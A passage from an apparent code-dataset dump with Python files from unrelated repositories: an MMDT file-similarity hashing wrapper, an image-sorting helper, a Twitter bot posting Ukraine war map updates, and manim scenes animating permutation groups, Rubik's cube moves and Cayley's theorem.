api = CDLL(lib_core_path)
self.py_mmdt_hash = api.mmdt_hash
self.py_mmdt_hash.argtypes = [c_char_p, POINTER(MMDT_Data)]
self.py_mmdt_hash.restype = c_int
self.py_mmdt_compare = api.mmdt_compare
self.py_mmdt_compare.argtypes = [c_char_p, c_char_p]
self.py_mmdt_compare.restype = c_double
self.py_mmdt_hash_streaming = api.mmdt_hash_streaming
self.py_mmdt_hash_streaming.argtypes = [c_char_p, c_uint32, POINTER(MMDT_Data)]
self.py_mmdt_hash_streaming.restype = c_int
self.py_mmdt_compare_hash = api.mmdt_compare_hash
self.py_mmdt_compare_hash.argtypes = [MMDT_Data, MMDT_Data]
self.py_mmdt_compare_hash.restype = c_double
@staticmethod
def __str_to_mmdt__(md_str):
md = MMDT_Data()
tmp = md_str.split(':')
md.index_value = int(tmp[0], 16)
md.main_value1 = int(tmp[1][:8], 16)
md.main_value2 = int(tmp[1][8:16], 16)
md.main_value3 = int(tmp[1][16:24], 16)
md.main_value4 = int(tmp[1][24:32], 16)
return md
@staticmethod
def __mmdt_to_str__(md):
md_str = "%08X:%08X%08X%08X%08X" % (md.index_value, md.main_value1, md.main_value2, md.main_value3, md.main_value4)
return md_str
def mmdt_hash(self, filename):
lp_filename = c_char_p(filename.encode())
md = MMDT_Data()
if not self.py_mmdt_hash(lp_filename, byref(md)):
return self.__mmdt_to_str__(md)
return None
def mmdt_compare(self, filename1, filename2):
lp_filename1 = c_char_p(filename1.encode())
lp_filename2 = c_char_p(filename2.encode())
        sim = self.py_mmdt_compare(lp_filename1, lp_filename2)
return sim
def mmdt_hash_streaming(self, filename):
with open(filename, 'rb') as f:
data = f.read()
md = MMDT_Data()
if not self.py_mmdt_hash_streaming(c_char_p(data), len(data), byref(md)):
return self.__mmdt_to_str__(md)
return None
def mmdt_compare_hash(self, md1_str, md2_str):
md1 = self.__str_to_mmdt__(md1_str)
md2 = self.__str_to_mmdt__(md2_str)
        sim = self.py_mmdt_compare_hash(md1, md2)
return sim
def build_features(self, classify_type=1):
if classify_type == 1:
self.build_datas = self.gen_simple_features()
elif classify_type == 2:
self.build_datas, self.build_labels = self.gen_knn_features()
def gen_simple_features(self):
datas = {}
for data in self.datas:
tmp = data.split(':')
index_value = int(tmp[0], 16)
if index_value not in datas.keys():
datas[index_value] = [('%s:%s' % (tmp[0], tmp[1]), int(tmp[2],10))]
else:
datas[index_value].append(('%s:%s' % (tmp[0], tmp[1]), int(tmp[2],10)))
return datas
def simple_classify(self, md, dlt):
datas = self.build_datas
index_value = int(md.split(':')[0], 16)
match_datas = datas.get(index_value, [])
for match_data in match_datas:
sim = self.mmdt_compare_hash(md, match_data[0])
if sim > dlt:
label_index = match_data[1]
if self.labels:
label = self.labels[label_index]
else:
label = 'match_%d' % label_index
return sim, label
return 0.0, 'unknown'
def gen_knn_features(self):
data_list = []
label_list = []
for data in self.datas:
tmp = data.split(':')
main_hash = tmp[1]
main_values = []
for i in range(0, len(main_hash), 2):
main_values.append(int(main_hash[i:i+2], 16))
data_list.append(main_values)
label_list.append(int(tmp[2]))
return data_list, label_list
def knn_classify(self, md, dlt):
def gen_knn_data(data):
tmp = data.split(':')
main_hash = tmp[1]
main_values = []
for i in range(0, len(main_hash), 2):
main_values.append(int(main_hash[i:i+2], 16))
return main_values
datas = self.build_datas
labels = self.build_labels
train_datas = np.array(datas)
t_data = gen_knn_data(md)
rowSize = train_datas.shape[0]
diff = np.tile(t_data, (rowSize, 1)) - train_datas
sqr_diff = diff ** 2
sqr_diff_sum = sqr_diff.sum(axis=1)
distances = sqr_diff_sum ** 0.5
sort_distance = distances.argsort()
matched = sort_distance[0]
label_index = labels[matched]
        # 1020 = sqrt(16 * 255**2), the maximum L2 distance between two
        # 16-byte hash vectors, so sim is normalized into [0, 1].
        sim = 1.0 - distances[matched]/1020.0
if sim > dlt:
if self.labels:
label = self.labels[label_index]
else:
label = 'match_%d' % label_index
return sim, label
return 0.0, 'unknown'
def classify(self, filename, dlt, classify_type=1):
md = self.mmdt_hash(filename)
if md:
arr_std = mmdt_std(md)
if classify_type == 1:
sim, label = self.simple_classify(md, dlt)
elif classify_type == 2:
sim, label = self.knn_classify(md, dlt)
else:
sim = 0.0
label = 'unknown'
print('%s,%f,%s,%f' % (filename, sim, label, arr_std))
else:
print('%s mmdt_hash is None' % filename)
``` |
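The class wraps the native library behind four calls: hash a file (by path or by bytes), and compare two files or two digest strings. A short usage sketch with placeholder file names, assuming the package is installed with its bundled `libcore` and feature data:
```python
# Hash two files and compare them both by digest string and by path.
from python_mmdt.mmdt.mmdt import MMDT

mmdt = MMDT()

md1 = mmdt.mmdt_hash("a.bin")   # e.g. "0012ABCD:00112233445566778899AABBCCDDEEFF"
md2 = mmdt.mmdt_hash("b.bin")

if md1 and md2:
    print(mmdt.mmdt_compare_hash(md1, md2))  # similarity in [0.0, 1.0]
print(mmdt.mmdt_compare("a.bin", "b.bin"))   # same comparison, file-based
```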
{
"source": "a23956491z/imageSorter",
"score": 3
} |
#### File: a23956491z/imageSorter/fs.py
```python
import os
from PIL import Image, ImageTk
import inspect
import re
import shutil
class picture:
def __init__(self, path):
self.image = Image.open(path)
tempWidth, tempHeight = self.image.size
self.ratio = tempHeight / float(tempWidth)
def resize(self, width, height, lockmode = None):
if lockmode == "height":
new_width = height / self.ratio
self.image = self.image.resize((int(new_width), height), Image.BILINEAR)
elif lockmode == "width":
new_height = self.ratio * width
self.image = self.image.resize((width, int(new_height)), Image.BILINEAR)
        elif lockmode is None:
            # PIL's Image.resize expects (width, height); the original swapped them.
            self.image = self.image.resize((width, height), Image.BILINEAR)
def get_tk(self):
return ImageTk.PhotoImage(self.image)
def get_size(self):
return self.image.size
class filesystem:
def __init__(self, path, filenameExten = None, fulldirlist = None):
self.path = path
self.fne = filenameExten
self.filelist = [f for f in os.listdir(path) if
os.path.isfile(os.path.join(path, f))]
        if fulldirlist is None:
self.subdir = [f for f in os.listdir(path) if
os.path.isdir(os.path.join(path, f))
]
self.fulldir = [self.get_dirpath(i) for i in range(len(self.subdir))]
else:
self.fulldir = fulldirlist
            print(self.fulldir[0])
            forre = ".+/(.+)$"
            self.subdir = [re.match(forre, self.fulldir[i]).group(1) for i
                           in range(len(self.fulldir))
                           if re.match(forre, self.fulldir[i])]
if self.fne != None:
forRe = ".*\." + self.fne + "$" # like".*\.py$"
self.filelist = [f for f in self.filelist if
re.match(forRe, f) ]
def moveFile(self, fileIndex, dirIndex):
if not(self.file_empty()):
oldfile = self.path + "/" + self.filelist[fileIndex]
newfile = self.fulldir[dirIndex] + "/" + self.filelist[fileIndex]
shutil.move(oldfile, newfile)
def get_filepath(self, fileIndex):
if(len(self.filelist)==0):
return None
else:
return self.path + "/" + self.filelist[fileIndex]
    # NOTE: this function has some known problems
def get_dirpath(self, dirIndex):
if(len(self.subdir)==0):
return None
else:
return self.path + "/" + self.subdir[dirIndex]
def refresh(self, dirlist = None):
self.filelist = [f for f in os.listdir(self.path) if
os.path.isfile(os.path.join(self.path, f))]
if self.fne != None:
forRe = ".*\." + self.fne + "$" # like".*\.py$"
self.filelist = [f for f in self.filelist if
re.match(forRe, f) ]
        if dirlist is not None:
self.fulldir = dirlist
forre = ".+/(.+)$"
self.subdir = [re.match(forre ,self.fulldir[i]).group(1)
for i in range(len(self.fulldir))
if re.match(forre, self.fulldir[i])]
def file_empty(self):
return not(bool(len(self.filelist)))
# if __name__ == "__main__":
# path = "C:/Users/a2395/Desktop/fortest"
# fulldir = ["C:/Users/a2395/Desktop/fortest/1" ,
# "C:/Users/a2395/Desktop/fortest/2","C:/Users/a2395/Desktop/fortest/3"]
# fs = filesystem(path = path, filenameExten = "txt", fulldirlist = fulldir)
# print(fs.subdir)
``` |
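With the `resize` fix above, both arguments follow PIL's usual `(width, height)` order. A small usage sketch with placeholder paths, assuming this module is importable as `fs`:
```python
# Placeholder image and sort directories; adjust the paths to taste.
from fs import picture, filesystem

pic = picture("photo.jpg")
pic.resize(400, 300, lockmode="width")  # keep aspect ratio, width fixed at 400
print(pic.get_size())

sorter = filesystem("./inbox", filenameExten="jpg",
                    fulldirlist=["./inbox/keep", "./inbox/discard"])
if not sorter.file_empty():
    sorter.moveFile(0, 0)  # move the first jpg into ./inbox/keep
```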
{
"source": "a2435191/ukraine-war-map-twitter-bot",
"score": 3
} |
#### File: ukraine_war_map_twitter_bot/logs/log.py
```python
import functools
import logging
from typing import Any, Callable, Dict, List, ParamSpec, TypeVar
from ..constants import LOGS_RELATIVE_PATH
class CustomFormatter(logging.Formatter):
_FORMATTER_WITH_FUNC_NAME = logging.Formatter(
"%(asctime)s %(levelname)s at %(funcName)s in %(module)s (%(lineno)d): %(message)s"
)
_FORMATTER_WOUT_FUNC_NAME = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
def usesTime(self):
return True
def formatMessage(self, record):
if record.funcName == "wrapper":
return self._FORMATTER_WOUT_FUNC_NAME.formatMessage(record)
else:
return self._FORMATTER_WITH_FUNC_NAME.formatMessage(record)
def get_logger(name: str) -> logging.Logger:
console_handler = logging.StreamHandler()
file_handler = logging.FileHandler(LOGS_RELATIVE_PATH)
console_handler.setLevel(logging.DEBUG)
file_handler.setLevel(logging.DEBUG)
formatter = CustomFormatter()
console_handler.setFormatter(formatter)
file_handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
logger.addHandler(console_handler)
logger.addHandler(file_handler)
return logger
def log_fn_enter_and_exit(logger: logging.Logger, log_exit: bool = False):
ParamTypes = ParamSpec("ParamTypes")
ReturnType = TypeVar("ReturnType")
def deco(fn: Callable[ParamTypes, ReturnType]):
@functools.wraps(fn)
def wrapper(*args: ParamTypes.args, **kwargs: ParamTypes.kwargs) -> ReturnType:
args_shortened: List[str] = [str(arg)[:100] for arg in args]
kwargs_shortened: Dict[str, str] = {str(k)[:100]: str(v)[:100] for k, v in kwargs.items()}
logger.debug(f"Entered {fn.__name__} with args {args_shortened} and kwargs {kwargs_shortened}")
result = fn(*args, **kwargs)
            if log_exit:
                logger.debug(
                    f"Exited {fn.__name__} with args {args_shortened} and kwargs {kwargs_shortened}"
                )
return result
return wrapper
return deco
```
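A quick sketch of how the two helpers combine; the absolute import path is an assumption (inside the package they are imported relatively, as `main.py` below shows), and `LOGS_RELATIVE_PATH` must point at a writable file:
```python
# Decorate a function so its entry (and optionally exit) is logged.
from ukraine_war_map_twitter_bot.logs.log import get_logger, log_fn_enter_and_exit

LOGGER = get_logger(__name__)

@log_fn_enter_and_exit(LOGGER, log_exit=True)
def add(a: int, b: int) -> int:
    return a + b

add(1, 2)  # emits "Entered add ..." and "Exited add ..." debug records
```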
#### File: src/ukraine_war_map_twitter_bot/main.py
```python
import json
from datetime import datetime
from typing import Any, Callable, Dict, ParamSpec, TypeVar
import tweepy
from .analyze import get_areas
from .constants import DESCRIPTION_PREFIX, DESCRIPTION_SUFFIX, URL
from .logs.log import get_logger, log_fn_enter_and_exit
from .utils import (
get_filename,
get_permanent_data,
get_png,
get_svg_data,
split_tweet,
update_permanent_data,
)
from .wikimedia_download import get_latest_ukraine_map
LOGGER = get_logger(__name__)
class UkraineBot:
@log_fn_enter_and_exit(LOGGER)
def __init__(self, permanent_data_path: str, twitter_secrets_path: str) -> None:
self._data_path = permanent_data_path
self._auth_path = twitter_secrets_path
self._api = self._auth_and_get_api()
_ParamTypes = ParamSpec("_ParamTypes")
_ReturnType = TypeVar("_ReturnType")
@log_fn_enter_and_exit(LOGGER)
def _auth_and_get_api(self) -> tweepy.API:
with open(self._auth_path) as fh:
secrets: Dict[str, Any] = json.load(fh)
auth = tweepy.OAuth1UserHandler(**secrets)
return tweepy.API(auth)
@log_fn_enter_and_exit(LOGGER)
def post(self) -> None:
try:
latest_data = get_latest_ukraine_map()
LOGGER.debug(f"latest ukraine map: {latest_data}")
permanent_data = get_permanent_data(self._data_path)
old_timestamp = permanent_data["latest_timestamp"]
old_ua_land_pct = permanent_data[
"latest_land_controlled_by_ukraine_percent"
]
LOGGER.debug(f"permanent_data: {permanent_data}")
if latest_data.timestamp <= old_timestamp:
                LOGGER.info(
                    f"latest timestamp ({latest_data.timestamp}) is not "
                    + f"newer than timestamp in {self._data_path} ({old_timestamp})"
                )
return
LOGGER.info(
f"latest timestamp ({latest_data.timestamp}) is "
+ f"newer than timestamp in {self._data_path} ({old_timestamp})"
)
filename = get_filename(latest_data.timestamp)
LOGGER.debug(f"filename: {filename}")
svg_data = get_svg_data(latest_data.svg_url)
file_ = get_png(svg_data)
media: tweepy.Media = self._api.media_upload(filename, file=file_)
LOGGER.debug(f"media: {media}")
description_chunks = split_tweet(
f"Link: {URL}\n\nDescription: " + latest_data.description
)
LOGGER.debug(f"description_chunks: {description_chunks}")
try:
ru_land, ua_land = get_areas(svg_data.decode("utf-8"))
except Exception as e:
LOGGER.warning("could not get areas due to exception: " + str(e))
land_control_str = ""
ua_land_pct = old_ua_land_pct
else:
ua_land_pct = ua_land / (ua_land + ru_land) * 100
land_control_str = f"Ukraine controls {round(ua_land_pct, 3)}% relative to the invasion's start"
if old_ua_land_pct is not None:
delta = round(ua_land_pct - old_ua_land_pct, 3)
if delta >= 0:
delta_string = f"🟢 +{delta}%"
else:
delta_string = f"🔴 {delta}%"
land_control_str += f" ({delta_string})\n"
LOGGER.debug(
f"ua_land: {ua_land}, ru_land: {ru_land}, ua_land_pct: {ua_land_pct}"
)
try:
tweet = self._api.update_status(
f"{DESCRIPTION_PREFIX} ({datetime.fromtimestamp(latest_data.timestamp)} UTC)\n"
                    + land_control_str
                    + DESCRIPTION_SUFFIX,
media_ids=[media.media_id],
)
LOGGER.debug(
f"tweet at https://twitter.com/ua_invasion_bot/status/{tweet.id}"
)
target_id: int = tweet.id
for chunk in description_chunks:
LOGGER.info(f"making reply tweet for {chunk}")
comment_tweet = self._api.update_status(
chunk, in_reply_to_status_id=target_id
)
target_id = comment_tweet.id
finally:
update_permanent_data(
self._data_path,
{
"latest_timestamp": latest_data.timestamp,
"latest_land_controlled_by_ukraine_percent": ua_land_pct,
},
)
except Exception as e:
LOGGER.error(e, exc_info=True)
raise e
``` |
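A minimal runner for the class above; the file paths are placeholders, and the secrets JSON must hold exactly the keyword arguments `tweepy.OAuth1UserHandler` accepts (consumer key/secret, access token/secret):
```python
# Run the bot once; wrap in cron/systemd (or a sleep loop) for scheduling.
from ukraine_war_map_twitter_bot.main import UkraineBot

bot = UkraineBot(
    permanent_data_path="permanent_data.json",
    twitter_secrets_path="twitter_secrets.json",
)
bot.post()  # tweets only if the map is newer than the stored timestamp
```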
{
"source": "a2435191/umtymp-at-group-project",
"score": 3
} |
#### File: manim/definition_and_notation/permutation_definition.py
```python
from manim import *
from numpy import array
from copy import deepcopy
class ArrayDefinition(Scene):
"""In the style of arraynotation.py
"""
def construct(self):
BRACKET_SIZE = 160
CIRCLE_COLORS = ['#0000FF', '#FF0000', '#FFFF00']
POSITIONS = [3 * LEFT, 0, 3 * RIGHT]
set_label = Tex(r"$A\!=$", font_size=BRACKET_SIZE).shift(3 * LEFT + 0.8 * RIGHT)
left_bracket = Tex(r"\{", font_size=BRACKET_SIZE).shift(1.0 * LEFT + 0.8 * RIGHT)
right_bracket = Tex(r"\}", font_size=BRACKET_SIZE).shift(1.0 * RIGHT + 0.8 * RIGHT)
self.play(
Write(left_bracket),
Write(set_label),
Write(right_bracket)
)
self.play(
left_bracket.animate.shift(3 * LEFT),
set_label.animate.shift(3 * LEFT),
right_bracket.animate.shift(3 * RIGHT)
)
circles = VGroup(*[Circle(0.8, color, fill_opacity=0.75).shift(pos + 0.8 * RIGHT)
for color, pos in zip(CIRCLE_COLORS, POSITIONS)])
self.play(Create(circles))
upper = VGroup(*circles, left_bracket, right_bracket)
lower = upper.copy()
upper.add(set_label)
function_label = Tex(r"\underline{$f: A \rightarrow A$}").shift(5 * LEFT)
self.play(upper.animate.shift(UP * 2), lower.animate.shift(DOWN * 2))
self.play(Write(function_label))
mapping = {0: 1, 2: 0, 1: 2}
for i, (top_index, btm_index) in enumerate(mapping.items()):
upper_circle = upper[top_index]
lower_circle = lower[btm_index]
arrow = Arrow(upper_circle, lower_circle)
function_text_opener = Tex(r"$f($").shift(DOWN * 0.7 * (i + 1), LEFT * 5.9)
function_input = upper_circle.copy().scale(0.2 / 100).move_to(function_text_opener).shift(0.4 * RIGHT)
function_text_middle = Tex(r"$) = $").shift(DOWN * 0.7 * (i + 1) , LEFT * 5)
function_output = lower_circle.copy().scale(0.2 / 100).move_to(function_text_middle).shift(0.6 * RIGHT)
function_text = VGroup(function_text_opener, function_text_middle)
self.play(AnimationGroup(
Create(arrow),
Write(function_text),
ScaleInPlace(function_input, 100),
ScaleInPlace(function_output, 100)
))
self.wait()
class CycleDefinition(Scene):
"""In the style of cyclenotation.py
Maybe unused?
"""
def construct(self):
r = 0.5
michael = Circle(radius=r, color='#0000FF', fill_color='#0000FF', fill_opacity=0.75)
pramod = Circle(radius=r, color='#FF0000', fill_color='#FF0000', fill_opacity=0.75)
will = Circle(radius=r, color='#FFFF00', fill_color='#FFFF00', fill_opacity=0.75)
michael.move_to(array([-2, 0, 0]))
will.move_to(array([2, 0, 0]))
arr = [michael, pramod, will]
ref_arr = deepcopy(arr)
pos = [array([-2, 0, 0]), array([0, 0, 0]), array([2, 0, 0])]
right = [Arc(radius=1, start_angle=PI, angle=PI).shift(array([1, 0, 0])),
Arc(radius=1, start_angle=0, angle=PI).shift(array([1, 0, 0]))]
left = [Arc(radius=1, start_angle=PI, angle=-PI).shift(array([-1, 0, 0])),
Arc(radius=1, start_angle=0, angle=-PI).shift(array([-1, 0, 0]))]
self.play(
*[Create(obj) for obj in arr]
)
self.play(
MoveAlongPath(arr[1], right[0]),
MoveAlongPath(arr[2], right[1])
)
self.play(
MoveAlongPath(arr[0], left[0]),
MoveAlongPath(arr[2], left[1])
)
self.play(
MoveAlongPath(arr[0], right[0]),
MoveAlongPath(arr[1], right[1])
)
self.play(
MoveAlongPath(arr[2], left[0]),
MoveAlongPath(arr[1], left[1])
)
self.play(
MoveAlongPath(arr[2], right[0]),
MoveAlongPath(arr[0], right[1])
)
self.play(
MoveAlongPath(arr[1], left[0]),
MoveAlongPath(arr[0], left[1])
)
```
#### File: manim/examples/permutation_group_definition.py
```python
from manim import *
from util_write_group_defs import write_group_defs
class PermutationGroupDefinition(Scene):
def construct(self):
matrix_one = r"""\begin{bmatrix}
1 & 2 & 3 \\
1 & 2 & 3
\end{bmatrix}"""
matrix_two = r"""\begin{bmatrix}
1 & 2 & 3 \\
1 & 3 & 2
\end{bmatrix}"""
matrix_three = r"""\begin{bmatrix}
1 & 2 & 3 \\
2 & 1 & 3
\end{bmatrix}"""
template = TexTemplate()
template.add_to_preamble(r"\usepackage{amsmath}")
write_group_defs(self, "Permutation Group", "G",
[matrix_one, matrix_two, matrix_three], r"\circ", 72, 50, tex_template=template)
```
#### File: manim/examples/rubiks_cube_group.py
```python
from math import isclose
from manim import *
from manim_rubikscube import *
from permutation_group_definition import write_group_defs
import numpy as np
class RubiksCubeGroup(Scene):
def construct(self):
title = Tex(r"\underline{Rubik's cube group}", font_size=72).shift(UP * 2)
set_def = MathTex(r"S", r"= \{F, B, U, L, D, R\}", font_size=64).next_to(title, DOWN)
grp_def = MathTex(r"R_3 = \langle S, \circ \rangle",
substrings_to_isolate=[r'S', r'\circ'], font_size=64)\
.set_color_by_tex_to_color_map({r'S': RED, r'\circ': BLUE})\
.next_to(set_def, DOWN)
self.play(Write(title), Write(set_def), Write(grp_def))
self.wait(2)
self.play(Unwrite(title), Unwrite(set_def), Unwrite(grp_def))
self.wait()
class DefineElements(ThreeDScene):
def construct(self):
cube = RubiksCube().scale(0.5).shift(IN)
self.move_camera(phi=60 * DEGREES, theta = 45 * DEGREES)
for cubie in cube.cubies.flatten():
cubie: Cubie = cubie
cubie.set_opacity(1.0)
self.play(FadeIn(cube))
actual_rubix_cube_center = VGroup(*cube.get_face("L"), *cube.get_face("R")).get_center()
print(actual_rubix_cube_center)
for axis in "FBUDLR":
face = VGroup(*cube.get_face(axis))
center = face.get_center() - actual_rubix_cube_center
print("center", center)
outwards_vector_normalized = center / np.sqrt(np.sum(center**2))
arc = Arc(1.5, 0, 0.8 * TAU, color=GRAY)\
.center()\
.add_tip(tip_length=0.3)\
.add_tip(at_start=True, tip_length=0.3)\
.set_shade_in_3d()
closeness = np.dot(arc.normal_vector, outwards_vector_normalized)
if not isclose(abs(closeness), 1.0, abs_tol=0.01): # to avoid rotating around <0, 0, 0>
rotate_around = np.cross(arc.normal_vector, outwards_vector_normalized)
print(arc.normal_vector, outwards_vector_normalized, rotate_around)
arc.rotate_about_origin(PI / 2, rotate_around)
print(arc.normal_vector)
arc.center()
arc.shift(actual_rubix_cube_center + outwards_vector_normalized * 2.5)
print("arc center", arc.get_arc_center())
print("target", actual_rubix_cube_center + outwards_vector_normalized * 2.5)
tex = Tex(
f"${axis}$ ",
"(CW)\n\n",
f"${axis}'$ ",
"(CCW)", font_size=56)\
.set_color_by_tex(axis, RED)\
.shift(2.7 * UP, 4.5 * RIGHT)
self.add_fixed_in_frame_mobjects(tex)
self.add_fixed_orientation_mobjects(tex)
self.play(
AnimationGroup(
Write(arc),
FadeIn(tex),
CubeMove(cube, axis)
)
)
self.wait(0.5)
self.play(
AnimationGroup(
CubeMove(cube, axis + "'"),
FadeOut(tex),
Unwrite(arc)
)
)
self.play(FadeOut(cube))
self.wait(0.5)
```
#### File: manim/examples/util_write_group_defs.py
```python
from manim import *
from typing import List
def write_group_defs(self: Scene, title_str: str, group_name_str: str,
elements: List[str], operator_str: str, ellipsis: bool = False,
title_font_size: int = 72, math_font_size: int = 64,
read_time: float = 2.0, after_erase_time: float = 0.5,
*args, **kwargs) -> None:
elements_with_commas: List[str] = []
for elem in elements:
elements_with_commas.append(",")
elements_with_commas.append(elem)
elements_with_commas = elements_with_commas[1:]
if ellipsis:
elements_with_commas.insert(-1, r"\cdots")
title = Tex(r"\underline{" + title_str + r"}", font_size=title_font_size).shift(UP * 2)
math = MathTex(
group_name_str,
r" = \left(\left\{",
*elements_with_commas,
r"\right\}, ",
operator_str,
r"\right)",
font_size=math_font_size,
*args, **kwargs
)
if ellipsis:
red_color_range = math[2:-5:2]
red_color_range.add(math[-4])
else:
red_color_range = math[2:-3:2]
for elem in red_color_range:
elem.set_color(RED)
math[-2].set_color(BLUE)
self.play(Write(title), Write(math))
self.wait(read_time)
self.play(Unwrite(title), Unwrite(math))
self.wait(after_erase_time)
```
#### File: manim/properties_and_theorems/cayley.py
```python
from manim import *
import numpy as np
from numpy import array
from copy import deepcopy
import math
class Cayley1(Scene):
def construct(self):
G = MathTex(r'G').scale(2)
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)').scale(2)
self.play(
Write(G)
)
self.wait(2)
self.play(
ReplacementTransform(G, group_def)
)
self.wait(2)
group_def.generate_target()
group_def.target.scale(0.5)
group_def.target.move_to(UP*3 + LEFT*4)
self.play(
MoveToTarget(group_def)
)
self.play(
group_def[1].animate.set_color(BLUE),
group_def[3].animate.set_color(RED)
)
g = MathTex(r'g').scale(2).set_color(BLUE)
self.play(
ReplacementTransform(group_def[1].copy(), g)
)
self.wait(2)
Tg = MathTex(r'T', r'_g').scale(2)
Tg[1].set_color(BLUE)
self.play(
ReplacementTransform(g, Tg[1])
)
self.play(
Write(Tg[0])
)
self.wait(2)
Tg_map = MathTex(r'T', r'_g', r': G \rightarrow G').scale(2)
Tg_map[1].set_color(BLUE)
self.play(
Transform(Tg, Tg_map[:2])
)
self.remove(Tg_map[:2])
self.play(
Write(Tg_map[2:])
)
self.wait(2)
self.play(
Unwrite(Tg_map[2:])
)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x').scale(2)
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
self.play(
Transform(Tg, Tg_func[:2])
)
self.play(
Write(Tg_func[2:5])
)
self.play(
Write(Tg_func[5], run_time=0.5)
)
self.play(
ReplacementTransform(group_def[3].copy(), Tg_func[6], run_time=0.5)
)
self.play(
ReplacementTransform(Tg_func[3].copy(), Tg_func[7], run_time=0.5)
)
self.wait(2)
self.remove(Tg)
Tg_func.generate_target()
Tg_func.target.move_to(UP * 3 + RIGHT * 4)
Tg_func.target.scale(0.5)
self.play(
MoveToTarget(Tg_func)
)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP*2.5)
self.play(
Create(divider)
)
self.wait(2)
Tg_comp = MathTex(r'(', r'T', r'_g', r'\circ', r'T', r'_{g^{-1}}', r')').scale(2)
Tg_comp[2].set_color(BLUE)
Tg_comp[5].set_color(BLUE)
self.play(
Write(Tg_comp[1], run_time=0.5)
)
self.play(
ReplacementTransform(group_def[1].copy(), Tg_comp[2], run_time=0.5)
)
self.play(
Write(Tg_comp[3:5], run_time=0.5)
)
self.play(
ReplacementTransform(group_def[1].copy(), Tg_comp[5], run_time=0.5)
)
self.play(
Write(Tg_comp[0]),
Write(Tg_comp[6])
)
Tg_comp2 = MathTex(r'(', r'T', r'_g', r'\circ', r'T', r'_{g^{-1}}', r')', r'(', r'x', r')').scale(2)
Tg_comp2[2].set_color(BLUE)
Tg_comp2[5].set_color(BLUE)
self.play(
Transform(Tg_comp, Tg_comp2[:7])
)
self.play(
Write(Tg_comp2[7:])
)
self.remove(Tg_comp)
Tg_comp3 = MathTex(r'T', r'_g', r'(', r'T', r'_{g^{-1}}', r'(', r'x', r')', r')').scale(2)
Tg_comp3[1].set_color(BLUE)
Tg_comp3[4].set_color(BLUE)
self.play(
ReplacementTransform(Tg_comp2, Tg_comp3)
)
self.wait(2)
Tg_comp_def = MathTex(r'T', r'_g', r'(', r'T', r'_{g^{-1}}', r'(', r'x', r')', r')', r'=', r'g', r'*', r'(', r'g^{-1}', r'*', r'x', r')').scale(2)
Tg_comp_def[1].set_color(BLUE)
Tg_comp_def[4].set_color(BLUE)
Tg_comp_def[10].set_color(BLUE)
Tg_comp_def[13].set_color(BLUE)
Tg_comp_def[11].set_color(RED)
Tg_comp_def[14].set_color(RED)
self.play(
ReplacementTransform(Tg_comp3, Tg_comp_def[:9])
)
self.play(
Write(Tg_comp_def[9:])
)
self.remove(Tg_comp3)
Tg_comp_def2 = MathTex(r'T', r'_g', r'(', r'T', r'_{g^{-1}}', r'(', r'x', r')', r')', r'=', r'(', r'g', r'*', r'g^{-1}', r')', r'*', r'x').scale(2)
Tg_comp_def2[1].set_color(BLUE)
Tg_comp_def2[4].set_color(BLUE)
Tg_comp_def2[11].set_color(BLUE)
Tg_comp_def2[13].set_color(BLUE)
Tg_comp_def2[12].set_color(RED)
Tg_comp_def2[15].set_color(RED)
self.play(
ReplacementTransform(Tg_comp_def, Tg_comp_def2)
)
Tg_comp_def3 = MathTex(r'T', r'_g', r'(', r'T', r'_{g^{-1}}', r'(', r'x', r')', r')', r'=', r'x').scale(2)
Tg_comp_def3[1].set_color(BLUE)
Tg_comp_def3[4].set_color(BLUE)
self.wait(2)
self.play(
FadeOut(Tg_comp_def2[10:16], run_time=0.5),
ReplacementTransform(Tg_comp_def2[:10], Tg_comp_def3[:10]),
ReplacementTransform(Tg_comp_def2[-1], Tg_comp_def3[-1])
)
self.remove(Tg_comp_def2)
Tg_inv = MathTex(r'(', r'T', r'_g', r')', r'^{-1}', r'=', r'T', r'_{g^{-1}}').scale(2)
Tg_inv[2].set_color(BLUE)
Tg_inv[7].set_color(BLUE)
self.wait(2)
self.play(
ReplacementTransform(Tg_comp_def3, Tg_inv)
)
self.wait(2)
self.play(
Unwrite(Tg_inv)
)
self.wait(2)
class Cayley2(Scene):
def construct(self):
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)')
group_def[1].set_color(BLUE)
group_def[3].set_color(RED)
group_def.move_to(UP*3 + LEFT*4)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x')
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
Tg_func.move_to(UP*3 + RIGHT*4)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP * 2.5)
self.add(group_def, Tg_func, divider)
prop1 = MathTex(r'T', r'_g', r'\text{ is\ldots}')
prop1[1].set_color(BLUE)
prop2 = Tex(r'bijective (well-defined inverse)')
prop3 = Tex(r'a self-mapping of the set of elements in $G$')
prop4 = Tex(r'\vdots')
prop5 = Tex(r'permutation!')
prop1.shift(UP*1)
print(prop1)
vg = VGroup(prop1, prop2, prop3, prop4, prop5)
for i in range(4):
vg[i+1].next_to(vg[i], DOWN)
self.play(
Write(vg[0])
)
self.play(
Write(vg[1])
)
self.play(
Write(vg[2])
)
self.play(
Write(vg[3])
)
self.play(
Write(vg[4])
)
self.wait(2)
self.play(
Unwrite(vg)
)
self.wait(2)
class Cayley3(Scene):
def construct(self):
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)')
group_def[1].set_color(BLUE)
group_def[3].set_color(RED)
group_def.move_to(UP * 3 + LEFT * 4)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x')
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
Tg_func.move_to(UP * 3 + RIGHT * 4)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP * 2.5)
self.add(group_def, Tg_func, divider)
